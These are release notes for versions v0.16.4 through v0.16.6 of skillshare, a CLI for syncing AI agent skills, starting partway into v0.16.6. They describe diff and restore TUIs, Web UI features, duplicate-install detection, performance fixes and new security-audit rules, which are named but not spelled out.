• backup/restore mode flags — -g and -p flags now work correctly; previously -g was misinterpreted as a target name due to missing parseModeArgs()
• diff hides .skillshare-meta.json — internal metadata file is no longer shown in file-level diff output
• diff --stat implies --no-tui — --stat now correctly skips the TUI

Upgrading

# Homebrew
brew upgrade skillshare

# Direct download
skillshare upgrade

# Or download from GitHub Releases
# https://github.com/runkids/skillshare/releases/tag/v0.16.6

Changelog

• ec60453 chore: update docs
• 7bdb9a4 deps: upgrade sergi/go-diff to v1.4.0 for text diff support
• e48a019 docs(diff): update docs for TUI, --stat, --patch, new category labels
• 2bcd2bf feat(backup): add ListTargetsWithBackups for TUI discovery
• 71dea4e feat(backup): add version listing and follow top-level symlinks
• c72ab5f feat(diff): add --patch and --stat flags with file stat, time info, and unified diff
• 924487b feat(diff): add file list, text diff, and time info to TUI detail panel
• 398e0bf feat(diff): add file-level diff engine for skill content comparison
• 27e5c3a feat(diff): add interactive bubbletea TUI with left-right panel layout
• 7a22b78 feat(diff): async expand with spinner and support all diff types
• c59498b feat(diff): extend diff entries with file-level data, source paths, and mtime
• 6fea949 feat(diff): redesign labels with git-style symbols and add statistics summary
• c5be126 feat(install,update,uninstall): add glob pattern matching for skill names
• 102b9e3 feat(restore): add --help flag and delete backup from TUI
• 995eb11 feat(restore): add unified Backup Restore TUI
• b371050 feat(skills): add devcontainer skill for AI-guided container execution
• 3e94539 feat(trash): add SKILL.md preview to TUI detail panel
• b2af4f4 feat(trash): add interactive TUI for trash list
• 6d90481 feat(tui): add red text to all destructive action confirmations
• 8a37748 feat(version): Homebrew-aware version check
• f5a8166 fix(backup,restore): handle -g/-p mode flags correctly
• 20411ed fix(diff): hide .skillshare-meta.json from file-level diff and make --stat imply --no-tui
• d8fb76d fix(restore): handle ReadDir error to prevent accidental backup deletion
• ae16181 refactor(auth): consolidate duplicated auth infra and fix GH_TOKEN gap
• ada5396 refactor(diff): address code review findings
• 30458e7 refactor(skill): rewrite built-in SKILL.md from reference manual to recipe-driven guide
• d2883e5 refactor(tui): consolidate duplicated utilities and cache detail rendering
• 13744f8 refactor: consolidate duplicated utilities and simplify diff API
• 6a90454 test(diff): add integration tests for file stat, patch, new labels, summary

🎨 skillshare v0.16.5 Release Notes

Release date: 2026-02-28

TL;DR

v0.16.5 is a Web UI and quality-of-life release:

1. Dark theme — toggle light/dark in the Web UI; auto-detects system preference
2. Update page — dedicated batch-update page with select-all, per-item progress, and result summary
3. Security overview card — dashboard shows risk level badge and severity breakdown at a glance
4. Sync mode selector — change merge/symlink mode per target directly from the Targets page
5. Custom target validation fix — check and doctor no longer false-flag user-defined targets
6. upgrade version transition — Homebrew and direct upgrades now show clear v0.x → v0.y output
7. 2 new targets — oh-my-pi (omp) and Lingma (lingma)

What's New

1) Web UI: Dark Theme

The Web UI now supports dark mode with a sun/moon toggle button. The theme:

• Persists to localStorage across sessions
• Auto-detects prefers-color-scheme on first visit
• Uses warm brown backgrounds and gold accents aligned with the website color palette
• All components (cards, code editor, modals) are theme-aware

2) Web UI: Dedicated Update Page

Previously, updating tracked skills was only available from the Sync page. v0.16.5 adds a dedicated Update page with:

• Checkbox list of all tracked repos with available updates
• Select-all toggle for batch operations
• Per-item progress tracking with staggered animations
• Result summary panel showing success/failure counts

Navigate to it from the sidebar under "Update".

3) Web UI: Security Overview Card

The Dashboard's security section now shows:

• A risk-level badge (clean/low/medium/high/critical)
• Color-coded severity breakdown (CRITICAL/HIGH/MEDIUM/LOW/INFO)
• Accent card highlight when CRITICAL findings exist
• Green "All Clear" message when no findings

4) Web UI: Sync Mode Selector

The Targets page now has a dropdown per target to switch between merge and symlink sync modes directly in the UI. Each mode includes a description explaining its behavior.

5) Custom Target Validation Fix

check and doctor previously only recognized built-in targets from targets.yaml, causing false "unknown target" warnings for user-configured custom targets.

Both commands now include user-defined target names from global and project config in the known set. Fixes #57.

6) upgrade Version Transition

skillshare upgrade now displays clear version transitions:

Upgraded  v0.16.3 → v0.16.5

This works for all upgrade paths:

• Homebrew: brew upgrade skillshare → shows transition or "Already up to date ✓"
• Direct download: binary self-update with version display
• Skill install: "Installed v0.16.5" (new) or "Upgraded v0.1.0 → v0.16.5"

7) New Targets

omp has the alias oh-my-pi. Both names work in all commands.

Web UI Accessibility Improvements

• aria-labels on interactive elements
• htmlFor linking labels to form inputs
• Focus trap for modals (Tab key stays within modal)
• ErrorBoundary wrapping the app for graceful error recovery

Bug Fixes

• Modal scroll-away — clicking checkboxes in the skill picker no longer causes content to disappear (replaced overflow-hidden with overflow-clip on Card)
• Subdir URL discovery — install form now correctly handles git URLs with subdirectory paths, showing the skill picker for multi-skill subdirectories #56

Changelog

• 85b6329 feat(targets): add Lingma as built-in target
• dce960e feat(targets): add oh-my-pi (omp) as built-in target
• b24a80f feat(ui): add dark theme with toggle, aligned to website color palette
• f7483fd feat(ui): add dedicated update page with batch selection
• 6def2a2 feat(ui): add security overview card to dashboard
• 18cfaa9 feat(ui): add sync mode selector to targets page
• ba7752f feat(ui): enhance install skill picker with descriptions and into-dir field
• aa4b3ec feat(ui): improve update page empty state and targets sync mode UX
• 0e48869 feat(upgrade): show version transition in Homebrew and skill upgrade output
• 00f8f38 fix(check): pass custom targets to unknown-target validation in project mode
• 208b34d fix(ui): add accessibility improvements — aria-labels, focus trap, ErrorBoundary, htmlFor
• a37c458 fix(ui): support subdir URL discovery and fix modal scroll-away bug
• ae500e8 include user-configured targets in unknown target validation

Notes

• Full changelog: https://github.com/runkids/skillshare/blob/main/CHANGELOG.md
• Security model docs: https://skillshare.runkids.cc/docs/guides/security
• Command reference: https://skillshare.runkids.cc/docs/commands

Contributors

@masonc15

🔒 skillshare v0.16.4 Release Notes

Release date: 2026-02-28

TL;DR

v0.16.4 is a safety, correctness, and performance release focused on duplicate prevention, target path fixes, audit rule expansion, and gitignore batch optimization:

1. Cross-path duplicate detection — install blocks accidental duplicates across different paths with a clear hint
2. Same-repo skip — reinstalls show friendly ⊘ skipped instead of an error
3. universal target fix — corrected path to ~/.agents/skills + coexistence docs with npx skills
4. 5 new audit rules — fetch-with-pipe, ip-address-url, data-uri (31 → 36 total patterns)
5. Batch gitignore performance — .gitignore ops batched to a single read/write; fixes hang on large projects
6. status/doctor at scale — single discovery pass + cached target checks + async version check + spinner
7. TUI action safety — list TUI actions now confirm before executing and pass explicit mode flags

What's New

1) Cross-path duplicate detection

install now tracks which repo each skill came from and blocks accidental duplicates across different paths. If you installed runkids/feature-radar --into feature-radar and later try runkids/feature-radar without --into, the CLI detects the conflict:

✗ this repo is already installed at skills/feature-radar/scan (and 2 more)
  Use 'skillshare update' to refresh, or reinstall with --force to allow duplicates

This check runs in all install paths: CLI direct, CLI discovery, Web UI single, and Web UI batch. Use --force to intentionally allow duplicates. The Web UI returns HTTP 409 when duplicates are found.

2) Same-repo skip

Reinstalling a skill from the same repo now shows a friendly skip indicator (⊘) instead of an error. Skipped skills are grouped by directory with a repo label in the summary output.

3) universal target fix + coexistence docs

The universal target now points to the correct path (~/.agents/skills instead of ~/.config/agents/skills). This is a shared agent directory that multiple AI CLIs can read from — also used by the npx skills CLI.

init and init --discover automatically include the universal target whenever any AI CLI is detected, labeled as "shared agent directory" to clarify its purpose.

New FAQ section documents coexistence with npx skills:

• Both tools can manage ~/.agents/skills/ simultaneously (skillshare uses symlinks, npx skills uses real directories)
• Prune logic won't delete the other tool's files
• Name collisions should be avoided; copy mode is more aggressive than merge mode
• npx skills list won't show skillshare-synced skills (lock file vs directory scan)

4) 5 new audit rules (31 → 36)

Five new rules close detection gaps in the security scanner:

fetch-with-pipe is automatically suppressed inside markdown code fences (same as destructive-commands, suspicious-fetch, etc.), so legitimate install documentation doesn't trigger false positives.

5) Batch gitignore performance

.gitignore updates during install reconciliation and uninstall are now batched into a single file read/write instead of one per skill. This eliminates a hang that occurred when .gitignore grew large (100K+ lines) in projects with many installed skills.

Previously, ReconcileProjectSkills called UpdateGitIgnore per-skill inside a WalkDir loop, re-reading the entire file each time — O(N×M) complexity. Now it collects entries during the walk and calls UpdateGitIgnoreBatch once. The same batch pattern applies to RemoveFromGitIgnoreBatch in uninstall (both global and project modes).

6) status and doctor at scale

Both commands now run a single skill discovery pass instead of repeating it per-section:

• status: 7× discovery → 1× (tracked repos extracted from existing results; printSourceStatus takes pre-computed count)
• doctor: 5× discovery → 1× (all check functions receive the shared []DiscoveredSkill)
• Target status checks (CheckStatusMerge/CheckStatusCopy) are cached so drift detection reuses the first result instead of calling again
• doctor overlaps its GitHub version check (3s timeout) with local I/O via goroutine
• A spinner is shown during discovery so the CLI doesn't appear frozen on large skill sets

7) Other fixes

• --force hint accuracy — force hints now use the actual repo URL (not per-skill subpath) and include --into when applicable
• update root-level skills — root-level skill repos (SKILL.md at repo root) no longer appear stale during batch update; fixed Subdir normalization mismatch
• update batch summary — aligned with sync-style single-line stats format with color-coded counts
• pull project mode leak — pull now forces --global for post-pull sync, preventing project-mode auto-detection when run inside a project directory
• list TUI action safety — audit, update, and uninstall actions in the skill list TUI now show a confirmation overlay before executing; actions pass explicit --global/--project mode flags to prevent mode mismatch
• Unified batch summary — install, uninstall, and update share a consistent single-line summary format with color-coded counts and elapsed time
• Command output spacing — trailing blank line after command output for consistent terminal readability

Migration

No breaking changes. Drop-in upgrade from v0.16.3.

Changelog

• 1f8fbd4 docs(website): add status/doctor perf entry to changelog
• 1a207e6 feat(audit): add fetch-with-pipe, ip-address-url, and data-uri rules
• 5d9a773 feat(init): label universal as shared agent directory and add coexistence docs
• 666091a feat(install): add cross-path duplicate detection and same-repo skip
• 1099ba4 feat(ui): unified batch summary and output patterns across commands
• 65402b9 feat(update): add phase headers and scanning spinner for batch mode
• 429e67a fix(audit): downgrade data-uri severity to MEDIUM
• 79f26f2 fix(docs): correct broken anchor link in docker-sandbox page
• 8997196 fix(init): correct universal target path and auto-include in init
• 13acc75 fix(list): add in-TUI confirmation and explicit mode flags for actions
• 965f060 fix(pull): force global sync after pull to avoid project mode auto-detection
• 6ca6f58 fix(test): adapt online audit parity test for skip-unchanged optimisation
• e14ef99 fix(ui): add trailing blank line after command output
• d86ee8c fix(ui): align spinner output and skip backup when no skills
• 41fe18b fix(update): normalize empty Subdir to "." for root-level skill repos
• 9a7ee1b fix: address code review findings (3 important + 5 suggestions)
• 6a5d2ea perf(collect): remove eager calculateDirSize from FindLocalSkills
• 4c70b7d perf(gitignore): batch read/write for install reconcile and uninstall
• 5017df2 perf(status,doctor): eliminate redundant discovery and CheckStatus calls
• 0f29dd3 perf(update): remove per-skill delay in batch update loop
• b4a4969 perf(update): skip unchanged skills in grouped repo updates
• 51d2e3a perf(update): speed up grouped updates and unstick progress bar
• 0f2d66e refactor(update): align batch summary with sync-style single-line format